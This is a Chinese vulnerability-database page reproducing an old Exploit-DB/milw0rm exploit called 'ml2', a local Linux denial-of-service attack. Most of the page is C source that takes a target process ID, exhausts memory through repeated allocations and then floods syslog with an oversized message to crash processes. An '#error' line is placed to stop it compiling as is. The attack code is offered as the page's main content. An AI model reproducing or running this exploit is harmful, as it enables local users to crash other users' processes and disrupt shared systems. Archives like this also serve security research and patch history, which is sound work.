ml2 – Local users can Crash processes-安全小百科

ml2 – Local users can Crash processes

漏洞ID	1053511	漏洞类型
发布时间	2001-01-03	更新时间	2001-01-03
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/238

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <syslog.h>

#error

int main(int argc, char **argv)
{
   	char foo[1000];
        char bigmsg[10000];
	char *s, *hold_s; 
	int i = 0;
        
        memset(bigmsg, 'X', sizeof(bigmsg)-1);
   	if (argc < 2) {
           	printf("usage: %s <pid to kill>n", argv[0]);
                exit(1);
        }
//	fork();
        memset(foo, 0, sizeof(foo));
        snprintf(foo, sizeof(foo), "/proc/%s/stat", argv[1]);
   	while (access(foo, F_OK) == 0) {
           	s = malloc(10000);
		if (s == NULL) {
			if (hold_s)
				free(hold_s);
/*			if (s)
				s[i%10000] = 0;
*/			printf("crashing ... n");
			openlog("b00m", 0, 0);
        		syslog(1, bigmsg);
			closelog();
		}
                printf("%dr", i++); fflush(stdout);
		hold_s = s;
        }
        return 0;
}


// milw0rm.com [2001-01-03]

相关推荐: Computer Associates InoculateIT MS Exchange Agent Vulnerability

Computer Associates InoculateIT MS Exchange Agent Vulnerability 漏洞ID 1103716 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 20…

文章版权归作者所有，未经允许请勿转载。

THE END